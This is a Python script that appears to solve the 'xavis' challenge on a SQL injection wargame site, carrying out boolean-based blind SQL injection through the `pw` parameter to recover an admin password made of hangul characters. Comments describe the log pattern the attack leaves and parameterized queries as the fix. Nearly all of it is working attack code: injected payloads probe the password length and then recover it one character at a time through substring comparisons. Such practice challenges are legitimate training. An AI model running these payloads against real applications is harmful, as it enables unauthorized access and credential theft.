import requests

# Defensive reading of this script: it is a boolean-based blind SQL injection
# client for the "xavis" wargame challenge at the URL below.  Every request
# injects into the `pw` GET parameter and treats the presence of the string
# "Hello admin" in the response body as its true/false oracle.  In a web
# server access log this shows up as a burst of GETs from one PHPSESSID whose
# `pw` value first carries `length(pw)=<n>` and then `substring(pw,<n>,1)`
# comparisons, one request per guess -- the pattern a WAF rule or log review
# would key on.  The server-side root cause is string-built SQL; a
# parameterized query removes the oracle entirely.

password = ''
password_length = -1  # stays -1 if no length in 1..19 produces "Hello admin"
URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}  # sent on every GET; the query itself travels in `params`
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}  # placeholder: the challenge session cookie must be supplied

# Phase 1: probe length(pw).  The author's print message records the
# assumption that MySQL's length() counts a hangul character as 3 bytes,
# hence the division by 3 -- nothing in this script verifies that.
for estimated_length in range(1, 20):
    query = {'pw': "' or length(pw)={} and id='admin".format(estimated_length)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if "Hello admin" in res.text:
        password_length = int(estimated_length / 3)
        print("admin's password length is {}(mysql takes hangul for 3).".format(password_length))
        break

# Phase 2: recover one character per position.  If password_length is still
# -1 the range below is empty and none of this runs.
for current_password_length in range(1, password_length+1) :
    base_password_index = -1
    base_password_limit = -1
    # Anchor syllables in ascending code-point order (the range() further down
    # relies on that ordering); the pair (index-1, index) brackets the scan.
    hangul_strings = "가나다라마바사아자차카타파하"
    for index, password_chr in enumerate(hangul_strings):
        # First anchor that sorts strictly above the target character.
        query={'pw': "' or substring(pw,{},1)<'{}' and id='admin".format(current_password_length, password_chr)}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if "Hello admin" in res.text:
            base_password_index = index - 1
            base_password_limit = index
            print("Looking for password between {} and {}".\
format(hangul_strings[base_password_index], hangul_strings[base_password_limit]))
            break
    if base_password_index < 0:
        # Reached either when index 0 matched (character sorts before '가',
        # so base_password_index == -1) or when no anchor matched at all.
        print("Password character {} is not a word(before '가')".format(current_password_length))
        break
    # bug when 'if base_password_index' and base_password_index is 0('가')
    # (author's own note: a bare truthiness test would skip index 0; the
    # explicit `>= 0` comparison below is what keeps that case working)
    if base_password_index >= 0:
        # Exhaustive scan between the two anchors; the upper bound is exclusive.
        for password_ord in range(ord(hangul_strings[base_password_index]), ord(hangul_strings[base_password_limit])):
            query = {'pw': "' or substring(pw,{},1)='{}' and id='admin".format(current_password_length, chr(password_ord))}
            res = requests.get(URL, params=query, headers=headers, cookies=cookies)
            if "Hello admin" in res.text:
                password = password + chr(password_ord)
                print(password)
                break
        else:
            # for/else: the scan finished without any equality match.
            print("Password at {} not found.".format(current_password_length))
            break

if len(password) == password_length:
    # NOTE(review): the extracted source shows a line break inside this
    # literal; it is kept here as "\n" -- confirm against the original file.
    print("Got it. \nPassword is {} or {}.".format(password.upper(), password.lower()))